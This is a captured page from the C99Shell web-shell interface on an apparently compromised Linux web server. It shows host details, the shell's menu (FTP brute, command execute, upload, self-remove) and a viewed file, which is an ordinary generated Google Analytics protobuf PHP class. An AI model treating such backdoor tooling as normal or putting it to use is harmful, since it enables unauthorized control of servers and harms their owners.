!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/google/analytics-data/src/V1alpha/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     BatchRunReportsRequest.php (4.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/analytics/data/v1alpha/analytics_data_api.proto

namespace Google\Analytics\Data\V1alpha;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * The batch request containing multiple report requests.
 *
 * Generated from protobuf message <code>google.analytics.data.v1alpha.BatchRunReportsRequest</code>
 */
class BatchRunReportsRequest extends \Google\Protobuf\Internal\Message
{
    
/**
     * A property whose events are tracked. This entity must be specified for the
     * batch. The entity within RunReportRequest may either be unspecified or
     * consistent with this entity.
     *
     * Generated from protobuf field <code>.google.analytics.data.v1alpha.Entity entity = 1;</code>
     */
    
private $entity null;
    
/**
     * Individual requests. Each request has a separate report response. Each
     * batch request is allowed up to 5 requests.
     *
     * Generated from protobuf field <code>repeated .google.analytics.data.v1alpha.RunReportRequest requests = 2;</code>
     */
    
private $requests;

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type \Google\Analytics\Data\V1alpha\Entity $entity
     *           A property whose events are tracked. This entity must be specified for the
     *           batch. The entity within RunReportRequest may either be unspecified or
     *           consistent with this entity.
     *     @type \Google\Analytics\Data\V1alpha\RunReportRequest[]|\Google\Protobuf\Internal\RepeatedField $requests
     *           Individual requests. Each request has a separate report response. Each
     *           batch request is allowed up to 5 requests.
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Analytics\Data\V1Alpha\AnalyticsDataApi::initOnce();
        
parent::__construct($data);
    }

    
/**
     * A property whose events are tracked. This entity must be specified for the
     * batch. The entity within RunReportRequest may either be unspecified or
     * consistent with this entity.
     *
     * Generated from protobuf field <code>.google.analytics.data.v1alpha.Entity entity = 1;</code>
     * @return \Google\Analytics\Data\V1alpha\Entity|null
     */
    
public function getEntity()
    {
        return isset(
$this->entity) ? $this->entity null;
    }

    public function 
hasEntity()
    {
        return isset(
$this->entity);
    }

    public function 
clearEntity()
    {
        unset(
$this->entity);
    }

    
/**
     * A property whose events are tracked. This entity must be specified for the
     * batch. The entity within RunReportRequest may either be unspecified or
     * consistent with this entity.
     *
     * Generated from protobuf field <code>.google.analytics.data.v1alpha.Entity entity = 1;</code>
     * @param \Google\Analytics\Data\V1alpha\Entity $var
     * @return $this
     */
    
public function setEntity($var)
    {
        
GPBUtil::checkMessage($var\Google\Analytics\Data\V1alpha\Entity::class);
        
$this->entity $var;

        return 
$this;
    }

    
/**
     * Individual requests. Each request has a separate report response. Each
     * batch request is allowed up to 5 requests.
     *
     * Generated from protobuf field <code>repeated .google.analytics.data.v1alpha.RunReportRequest requests = 2;</code>
     * @return \Google\Protobuf\Internal\RepeatedField
     */
    
public function getRequests()
    {
        return 
$this->requests;
    }

    
/**
     * Individual requests. Each request has a separate report response. Each
     * batch request is allowed up to 5 requests.
     *
     * Generated from protobuf field <code>repeated .google.analytics.data.v1alpha.RunReportRequest requests = 2;</code>
     * @param \Google\Analytics\Data\V1alpha\RunReportRequest[]|\Google\Protobuf\Internal\RepeatedField $var
     * @return $this
     */
    
public function setRequests($var)
    {
        
$arr GPBUtil::checkRepeatedField($var\Google\Protobuf\Internal\GPBType::MESSAGE\Google\Analytics\Data\V1alpha\RunReportRequest::class);
        
$this->requests $arr;

        return 
$this;
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--